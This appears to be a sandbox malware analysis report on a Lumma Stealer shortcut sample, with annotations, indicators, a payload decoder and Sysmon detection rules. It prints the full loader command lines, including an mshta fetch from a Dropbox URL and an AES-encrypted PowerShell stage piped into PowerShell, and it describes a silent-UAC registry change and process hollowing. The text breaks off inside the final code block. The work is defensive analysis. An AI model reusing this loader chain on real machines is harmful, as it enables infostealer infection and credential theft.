Malware Analysis Report

2024-11-15 06:19

Sample ID: 240227-f2e8hahb85
Target: 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
SHA256: 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50
Tags: lumma, evasion, stealer, trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50

Threat Level: Known bad

The file 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk was found to be: Known bad.

Malicious Activity Summary

lumma evasion stealer trojan

Lumma Stealer

UAC bypass

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Modifies system certificate store

Modifies registry class

Checks processor information in registry

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-27 05:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-27 05:21

Reported

2024-02-27 05:24

Platform

win7-20240221-en

Max time kernel

119s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk

Signatures

Blocklisted process makes network request

Process: C:\Windows\system32\mshta.exe (2 events; the sandbox records no indicator or target for this signature). mshta.exe is on the sandbox's blocklist of script hosts; the request is the HTTPS fetch of the Dropbox URL on its command line (see Processes), which matches the single dl.dropboxusercontent.com connection under Network.

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (recorded 3 times)

Caveat: this is a side effect of the launch chain, not a payload drop. forfiles.exe was started with /p C:\Windows\Vss, so every child inherits that working directory, and the unexpanded %ProgramData% in the path shows a relative path being resolved against it. The file being opened is PowerShell's own Start Menu shortcut, which powershell.exe routinely opens on startup (the same signature fires in both detonations).

Enumerates physical storage devices

Modifies Internet Explorer settings

Tags: adware, spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\mshta.exe | N/A

mshta.exe hosts the HTA inside the Internet Explorer engine, which creates this key on first use; on its own this is not a settings change made by the sample.

Modifies system certificate store

Tags: evasion, spyware, trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Windows\system32\mshta.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [certificate blob not reproduced in this capture] | C:\Windows\system32\mshta.exe | N/A

Caveat: A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 is the SHA-1 thumbprint of the DigiCert Global Root CA. Writing it under AuthRoot is what CryptoAPI's automatic root update does the first time a process validates a chain anchored in a root that is not yet cached, here mshta.exe's TLS connection to Dropbox. It is not the sample installing a rogue root. The check for this signature is always whether the thumbprint belongs to a root Microsoft ships; this one does.

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (recorded 3 times)

Suspicious use of WriteProcessMemory

The sandbox records one row per write; each parent wrote to its child three times. Collapsed to the lineage they describe:

PID 1132 cmd.exe
  > PID 2292 forfiles.exe
    > PID 2484 powershell.exe
      > PID 2456 mshta.exe
        > PID 1168 powershell.exe
          > PID 1204 powershell.exe

Two or three writes from a parent into a freshly created child are what CreateProcess does for every new process (it populates the child's startup parameters), so these rows document the launch chain rather than code injection. This Windows 7 run ends at the stage-2 PowerShell (PID 1204): no executable was dropped, no thread context was set, and no Lumma C2 domain was contacted. Compare behavioral2, where the same chain continues.

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

forfiles.exe is used as a command proxy: /c runs the quoted command for each entry it finds under /p C:\Windows\Vss, so PowerShell is started by forfiles rather than directly by cmd.exe, and every child inherits C:\Windows\Vss as its working directory. The closing quote is absent from the captured command line as recorded.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $xRnrtl = 'AAAAAAAAAAAAAAAAAAAAAD0Af5kmiW2Hnx1ert6ZiHkcrCG5xRw5g+RXkvjSvgaUbk+srbVrOsQgn8toO+hu0Qw1KQj7FAk5xMoqfeLJjMEeamlWrF3FTQ6in6FDMU0esWs41x91rJ/vkrJQOkHUMM2MmLD03n+lBrw2YeIcINOqvu4GIVPjd+Fis/QpUW5Fj8iNCDQy7bTeb/cl1K0KC1ocqAlvj83iKlmuvdzxPum6cIQxLt+2YLh6fmAQocUETi+pQw294/BrcWHiPbCLQ3IVN1QFO/QcDcgmCGGhLZSmlSKvXWS4pkFTnsaeCv0q8qpFQPIbBpzGkWGBKxMJYhQh81lXHyPxeOeFyFq6jqW2vUm+uqMCwX1N5g5UHXYw3Qg4zpyOCq0I5EwoDqzACg0FQ7NLbZAuwhTLK+Yu1JUpq7a86i+FRnVjkA9yOJMjUROJtiOoDNfMdo0ej8BzSKoid4bytekfnZGfb1xfEAyrNCki102wWcJK/vZZFJJQ0EWOmR4qPclxZ3kj3QXa7iwBBn/xEMGg8xE8RDWaHfXHZqdxlpnoKmQX6CchYBPK5Q/alHBAM5gOIN5RcmnQecgz+itBcGKRKac4QUIuYCsTNOGFGvc0/93UPNG9W8OrCD+b24Y2bZP/KolyWolNdjJRHwp4RJAA9iJshbpdMe4n95z2TmNVPEVN28sDZ0kfiJCKpkbu1TkpQNSnY46SLTiZTT3ajO8Sox/hCnztghhj4DMhfQfHJBcMyZ1yynlBM+7lNgUyvioQxQ2KPY7KDi7JTpk1iQYGc+oBvO/fWUMtz9kzyEyxJpOGkwI3MMjDpUYIc9iprfEHj8hpwVdPjhcenIyhZqn28939MlitHffq24shDMzCPgjnU9OWPsMhEKvfu34pU/yjbMkwLHEjcQ==';$PWFaA = 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI=';$rtbrSxS = New-Object 'System.Security.Cryptography.AesManaged';$rtbrSxS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rtbrSxS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rtbrSxS.BlockSize = 128;$rtbrSxS.KeySize = 256;$rtbrSxS.Key = [System.Convert]::FromBase64String($PWFaA);$jIXAy = [System.Convert]::FromBase64String($xRnrtl);$rSpXWojt = $jIXAy[0..15];$rtbrSxS.IV = $rSpXWojt;$mXooDLjjw = $rtbrSxS.CreateDecryptor();$KHnzkbgXQ = $mXooDLjjw.TransformFinalBlock($jIXAy, 16, $jIXAy.Length - 16);$rtbrSxS.Dispose();$iIauy = New-Object System.IO.MemoryStream( , $KHnzkbgXQ );$Izyrh = New-Object System.IO.MemoryStream;$thcRRYmqg = New-Object System.IO.Compression.GzipStream $iIauy, ([IO.Compression.CompressionMode]::Decompress);$thcRRYmqg.CopyTo( $Izyrh );$thcRRYmqg.Close();$iIauy.Close();[byte[]] $QWoIKfh = $Izyrh.ToArray();$KKSHrJAF = [System.Text.Encoding]::UTF8.GetString($QWoIKfh);$KKSHrJAF | powershell -

This is the command the HTA served from Dropbox hands to PowerShell; it is one command line (the break before "| powershell -" in the raw capture is an extraction artifact). -w 1 hides the window, -ep Unrestricted sets the execution policy for the session and -nop skips profiles. The script base64-decodes a 32-byte key (the ASCII string wHCNKezctJQGEqekDcoOxrthPiRGNtVb), decrypts the blob from offset 16 with AES-256 in ECB mode and zero padding (the first 16 bytes are assigned as the IV, which ECB ignores; they are all zero here), gunzips the result and decodes it as UTF-8. The plaintext script is then piped into a second powershell.exe started with a lone "-", which reads its script from standard input. The stage-2 code therefore never appears on disk or in any command line; script-block logging (event 4104) or a memory dump of the child is what captures it.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | dl.dropboxusercontent.com | udp
GB | 162.125.64.15:443 | dl.dropboxusercontent.com | tcp

Files

memory/2484-40-0x000000001B320000-0x000000001B602000-memory.dmp

memory/2484-41-0x0000000002010000-0x0000000002018000-memory.dmp

memory/2484-42-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/2484-43-0x0000000002670000-0x00000000026F0000-memory.dmp

memory/2484-44-0x0000000002670000-0x00000000026F0000-memory.dmp

memory/2484-45-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/2484-46-0x0000000002670000-0x00000000026F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WQS6Z484B6BTW1XCZ8AJ.temp

MD5 7901212826eb130a49dd170cd9e46291
SHA1 3e2d163be64f8c261b4685c2e4cd0e93d567bd64
SHA256 e5ca5cef2dc4acacc0d2047b84d2be4e23590980a6421157c186f51a63e74825
SHA512 f4649624a43bdbca84460ce441eed2fad4f5e61a2605739d296d1cd565a6ae2501efbdc82df910b1f1a1d2972a9b0779b0374aa15f13b98dd42d4d4b3da72fd8

(A Windows "Recent items" jump-list temp file written when the shortcut is opened; an operating-system artifact, not a drop by the sample.)

memory/1168-69-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

memory/1168-70-0x00000000023F0000-0x00000000023F8000-memory.dmp

memory/1168-71-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/1168-72-0x0000000002A00000-0x0000000002A80000-memory.dmp

memory/1168-73-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/1168-74-0x0000000002A00000-0x0000000002A80000-memory.dmp

memory/1168-75-0x0000000002A00000-0x0000000002A80000-memory.dmp

memory/1168-76-0x0000000002A00000-0x0000000002A80000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

(These are the hashes of zero bytes: the entry records a handle to the Server service named pipe, not file content.)

memory/1204-83-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/1204-84-0x0000000001E80000-0x0000000001F00000-memory.dmp

memory/1204-85-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/1204-86-0x0000000001E80000-0x0000000001F00000-memory.dmp

memory/1204-87-0x0000000001E80000-0x0000000001F00000-memory.dmp

memory/1204-88-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/1168-89-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/2484-90-0x0000000002670000-0x00000000026F0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-27 05:21

Reported

2024-02-27 05:24

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

152s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk

Signatures

Lumma Stealer

Tags: stealer, lumma

UAC bypass

Tags: evasion, trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

ConsentPromptBehaviorAdmin = 0 selects "Elevate without prompting" for members of Administrators: UAC stays enabled, but every elevation by an admin user becomes silent. The value lives under HKLM, so the PowerShell instance that wrote it already held administrative rights; the change removes prompts for whatever runs later on this host until the value is reset to the default of 5.

Blocklisted process makes network request

Process | Events
C:\Windows\system32\mshta.exe | 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 1

The two mshta.exe events are the fetch of the HTA from Dropbox, as in behavioral1. The powershell.exe event is new to this run and is the stage-2 script retrieving the next stage: "Downloads MZ/PE file" fires only here, and driver.exe appears on disk afterwards. The report does not tie the download to a host; the first non-Dropbox host in the Network section is toptendulichmy.com.

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A

Geo\Nation holds the configured country, and stealers do read it to skip certain locales, but here both readers are Windows components in the launch chain rather than the payload; this signature fires in many detonations and is weak evidence on its own.

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\driver.exe | N/A

driver.exe is the PE fetched by the stage-2 PowerShell (PID 4440 launches it). The Files section records two different hashes for this path, so its content changed during the run; treat both SHA256 values as indicators.

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Videos\Captures\desktop.ini | C:\Windows\system32\svchost.exe | N/A

Noise: the writing process is the BcastDVRUserService svchost (Game DVR), which creates Videos\Captures on a fresh Windows 10 profile; it is unrelated to the sample.

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2228 set thread context of 1624 | N/A | C:\Users\Admin\AppData\Roaming\driver.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

driver.exe started RegAsm.exe, a Microsoft-signed .NET utility, wrote into it repeatedly (see the WriteProcessMemory rows below) and then reset a thread context in it: the process-hollowing sequence. The Lumma payload therefore runs under the RegAsm.exe name, and the 0x400000-0x449000 region of PID 1624 listed under Files is where the unpacked stealer sits. A first RegAsm.exe instance, PID 4500, received writes but no SetThreadContext and shows no further activity.

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

(Same launch-chain artifact as in behavioral1: a relative path resolved against the C:\Windows\Vss working directory inherited from forfiles.exe /p, and the file is PowerShell's own shortcut.)

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\svchost.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-609813121-2907144057-1731107329-1000\{95469607-7B9A-455B-8133-0B85F82F9C00} | C:\Windows\system32\svchost.exe | N/A

Both signatures fire on the single svchost.exe in the process list (the BcastDVRUserService instance), which is not in the sample's lineage; they are Windows background activity, not anti-analysis checks by the malware.

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (recorded 3 times)

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A

OpenWith.exe runs with -Embedding, i.e. it was COM-activated rather than spawned by a process in the chain; the hook belongs to that Windows dialog, not to code from the sample.

Suspicious use of WriteProcessMemory

The sandbox records one row per write; collapsed to one line per parent/child pair with the number of writes:

PID 2340 cmd.exe
  > PID 1956 forfiles.exe (2 writes)
    > PID 2844 powershell.exe (2 writes)
      > PID 2300 mshta.exe (2 writes)
        > PID 4420 powershell.exe (2 writes)
          > PID 4440 powershell.exe (2 writes)
            > PID 2228 C:\Users\Admin\AppData\Roaming\driver.exe (3 writes)
              > PID 4500 RegAsm.exe (3 writes, no SetThreadContext)
              > PID 1624 RegAsm.exe (9 writes, followed by SetThreadContext)

Two or three writes from a parent into a freshly created child are what CreateProcess does for every new process. The nine writes from driver.exe into RegAsm.exe PID 1624, followed by SetThreadContext on the same PID, are the injection; the 0x400000-0x449000 region of PID 1624 under Files is the image that was written there.

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $xRnrtl = '[base64 AES ciphertext; identical to the $xRnrtl string in the behavioral1 Processes section]';$PWFaA = 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI=';$rtbrSxS = New-Object 'System.Security.Cryptography.AesManaged';$rtbrSxS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rtbrSxS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rtbrSxS.BlockSize = 128;$rtbrSxS.KeySize = 256;$rtbrSxS.Key = [System.Convert]::FromBase64String($PWFaA);$jIXAy = [System.Convert]::FromBase64String($xRnrtl);$rSpXWojt = $jIXAy[0..15];$rtbrSxS.IV = $rSpXWojt;$mXooDLjjw = $rtbrSxS.CreateDecryptor();$KHnzkbgXQ = $mXooDLjjw.TransformFinalBlock($jIXAy, 16, $jIXAy.Length - 16);$rtbrSxS.Dispose();$iIauy = New-Object System.IO.MemoryStream( , $KHnzkbgXQ );$Izyrh = New-Object System.IO.MemoryStream;$thcRRYmqg = New-Object System.IO.Compression.GzipStream $iIauy, ([IO.Compression.CompressionMode]::Decompress);$thcRRYmqg.CopyTo( $Izyrh );$thcRRYmqg.Close();$iIauy.Close();[byte[]] $QWoIKfh = $Izyrh.ToArray();$KKSHrJAF = [System.Text.Encoding]::UTF8.GetString($QWoIKfh);$KKSHrJAF | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

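The function below is an added example for this write-up, not code from the report or from the sample. It performs the same unpacking as the command above (the full base64 ciphertext is the $xRnrtl string in the behavioral1 Processes section, the key is the $PWFaA string) but writes the decrypted stage-2 script to a file and summarises it instead of piping it into "powershell -". The function name, the output path and the gzip-magic check are ours; run it only on an isolated analysis VM.

```powershell
# Added example, written for this write-up; not the report's code and not the sample's.
# Re-runs the loader's own unpacking (AES-256-ECB, zero padding, 16-byte prefix discarded,
# then gzip) and writes the result to disk instead of executing it.
# $CipherB64 is the $xRnrtl string and $KeyB64 the $PWFaA string from the recorded command
# line; the function name and the output path are ours.
function ConvertFrom-AesGzipStage {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$CipherB64,
        [Parameter(Mandatory)][string]$KeyB64,
        [string]$OutFile = (Join-Path $PWD 'stage2.decoded.ps1')
    )
    $key  = [Convert]::FromBase64String($KeyB64)
    $data = [Convert]::FromBase64String($CipherB64)
    if ($key.Length -ne 32) { throw "Key is $($key.Length) bytes; AES-256 needs 32" }
    if ($data.Length -lt 32 -or (($data.Length - 16) % 16) -ne 0) {
        throw "Expected a 16-byte prefix followed by whole AES blocks, got $($data.Length) bytes"
    }

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::ECB      # ECB never uses the IV
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::Zeros   # the loader strips nothing
    $aes.Key     = $key
    $aes.IV      = [byte[]]$data[0..15]                                 # kept only to mirror the loader
    $decryptor = $aes.CreateDecryptor()
    try     { $plain = $decryptor.TransformFinalBlock($data, 16, $data.Length - 16) }
    finally { $decryptor.Dispose(); $aes.Dispose() }

    # With the right key the plaintext is a gzip member, which always starts with 1F 8B.
    # Anything else means wrong key, offset or mode: stop instead of feeding junk to gzip.
    if ($plain.Length -lt 18 -or $plain[0] -ne 0x1F -or $plain[1] -ne 0x8B) {
        $head = ($plain[0..([Math]::Min(3, $plain.Length - 1))] | ForEach-Object { $_.ToString('X2') }) -join ' '
        throw "Decrypted data is not gzip (starts with $head)"
    }
    $inStream  = New-Object System.IO.MemoryStream -ArgumentList (,$plain)
    $outStream = New-Object System.IO.MemoryStream
    $gzip = New-Object System.IO.Compression.GzipStream $inStream, ([System.IO.Compression.CompressionMode]::Decompress)
    try { $gzip.CopyTo($outStream) } finally { $gzip.Dispose(); $inStream.Dispose() }

    $script = [System.Text.Encoding]::UTF8.GetString($outStream.ToArray())
    Set-Content -LiteralPath $OutFile -Value $script -Encoding UTF8

    # Summarise rather than execute: URLs are the first thing to pull out of a stage-2 loader.
    [pscustomobject]@{
        OutFile = $OutFile
        Bytes   = $outStream.Length
        Sha256  = (Get-FileHash -LiteralPath $OutFile -Algorithm SHA256).Hash
        Urls    = @([regex]::Matches($script, 'https?://[^\s''"<>]+') | ForEach-Object { $_.Value } | Sort-Object -Unique)
    }
}

# Usage: paste the two base64 strings from the recorded command line.
# ConvertFrom-AesGzipStage -CipherB64 'AAAAAAAAAAAAAAAAAAAAAD0A...' -KeyB64 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI='
```

The gzip-magic check is the practical difference from the loader: the loader trusts its own key, whereas an analyst re-running the scheme against a variant wants to know immediately whether the key or the layout changed before reading what gzip returns.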
C:\Users\Admin\AppData\Roaming\driver.exe

"C:\Users\Admin\AppData\Roaming\driver.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

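Added example (not report output and not the sample's code): the lineage listed above expressed as Sysmon process-creation rules (Event ID 1). It runs stand-alone on the constructed records at the bottom, which mirror the behavioral2 PIDs and add one benign PowerShell launch as a control; the rule names, the ConvertFrom-SysmonProcessCreate helper and the sample records are assumptions of the example, not data from the report.

```powershell
# Added example, written for this write-up; not report output and not code from the sample.
# Flags the parent/child pairs the two detonations actually show and prints the lineage for
# each hit. Rule names are ours; $SampleEvents is constructed test data, not real log data.

$ChainRules = @(
    @{ Name = 'forfiles-proxies-powershell';   Parent = 'forfiles.exe';   Child = 'powershell.exe' }
    @{ Name = 'powershell-launches-mshta-url'; Parent = 'powershell.exe'; Child = 'mshta.exe'; ChildCmd = 'https?://' }
    @{ Name = 'mshta-spawns-powershell';       Parent = 'mshta.exe';      Child = 'powershell.exe' }
    @{ Name = 'powershell-script-from-stdin';  Parent = 'powershell.exe'; Child = 'powershell.exe'; ChildCmd = 'powershell\.exe"?\s+-\s*$' }
    @{ Name = 'appdata-exe-spawns-regasm';     ParentPath = '\\AppData\\Roaming\\[^\\]+\.exe$'; Child = 'RegAsm.exe' }
)

function Get-Lineage {
    # Walk ParentProcessId links as far as the event set allows; $seen bounds PID reuse loops.
    param([hashtable]$ByPid, [int]$ProcessId)
    $names = New-Object System.Collections.Generic.List[string]
    $seen = @{}
    $cur = $ProcessId
    while ($ByPid.ContainsKey($cur) -and -not $seen.ContainsKey($cur)) {
        $seen[$cur] = $true
        $names.Insert(0, [IO.Path]::GetFileName([string]$ByPid[$cur].Image))
        $cur = [int]$ByPid[$cur].ParentProcessId
    }
    $names -join ' > '
}

function Test-ChainRules {
    # $Events: objects with ProcessId, ParentProcessId, Image, ParentImage, CommandLine
    param([Parameter(Mandatory)][object[]]$Events, [object[]]$Rules = $ChainRules)
    $byPid = @{}
    foreach ($e in $Events) { $byPid[[int]$e.ProcessId] = $e }
    foreach ($e in $Events) {
        $parentName = [IO.Path]::GetFileName([string]$e.ParentImage)
        $childName  = [IO.Path]::GetFileName([string]$e.Image)
        foreach ($r in $Rules) {
            if ($r.Parent     -and $parentName    -ne       $r.Parent)     { continue }
            if ($r.Child      -and $childName     -ne       $r.Child)      { continue }
            if ($r.ParentPath -and $e.ParentImage -notmatch $r.ParentPath) { continue }
            if ($r.ChildCmd   -and $e.CommandLine -notmatch $r.ChildCmd)   { continue }
            [pscustomobject]@{
                Rule        = $r.Name
                ProcessId   = $e.ProcessId
                Lineage     = Get-Lineage -ByPid $byPid -ProcessId ([int]$e.ProcessId)
                CommandLine = $e.CommandLine
            }
        }
    }
}

function ConvertFrom-SysmonProcessCreate {
    # Turns Sysmon Event ID 1 records into the flat shape Test-ChainRules expects.
    param([Parameter(ValueFromPipeline)]$Event)
    process {
        $data = @{}
        foreach ($n in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            ProcessId = [int]$data.ProcessId; ParentProcessId = [int]$data.ParentProcessId
            Image = $data.Image; ParentImage = $data.ParentImage; CommandLine = $data.CommandLine
        }
    }
}

# Constructed records mirroring the behavioral2 PIDs (not real log data); 1200 stands in for explorer.exe.
$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$url = 'https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han'
$SampleEvents = @(
    [pscustomobject]@{ ProcessId = 2340; ParentProcessId = 1200; ParentImage = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\system32\cmd.exe'; CommandLine = 'cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk' }
    [pscustomobject]@{ ProcessId = 1956; ParentProcessId = 2340; ParentImage = 'C:\Windows\system32\cmd.exe'; Image = 'C:\Windows\System32\forfiles.exe'; CommandLine = "`"C:\Windows\System32\forfiles.exe`" /p C:\Windows\Vss /c `"powershell start mshta $url" }
    [pscustomobject]@{ ProcessId = 2844; ParentProcessId = 1956; ParentImage = 'C:\Windows\System32\forfiles.exe'; Image = $ps; CommandLine = "start mshta $url" }
    [pscustomobject]@{ ProcessId = 2300; ParentProcessId = 2844; ParentImage = $ps; Image = 'C:\Windows\system32\mshta.exe'; CommandLine = "`"C:\Windows\system32\mshta.exe`" $url" }
    [pscustomobject]@{ ProcessId = 4420; ParentProcessId = 2300; ParentImage = 'C:\Windows\system32\mshta.exe'; Image = $ps; CommandLine = "`"$ps`" -w 1 -ep Unrestricted -nop `$xRnrtl = '...'" }
    [pscustomobject]@{ ProcessId = 4440; ParentProcessId = 4420; ParentImage = $ps; Image = $ps; CommandLine = "`"$ps`" -" }
    [pscustomobject]@{ ProcessId = 2228; ParentProcessId = 4440; ParentImage = $ps; Image = 'C:\Users\Admin\AppData\Roaming\driver.exe'; CommandLine = '"C:\Users\Admin\AppData\Roaming\driver.exe"' }
    [pscustomobject]@{ ProcessId = 1624; ParentProcessId = 2228; ParentImage = 'C:\Users\Admin\AppData\Roaming\driver.exe'; Image = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'; CommandLine = '"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"' }
    # Control: an administrator opening PowerShell from the Start menu must not match any rule.
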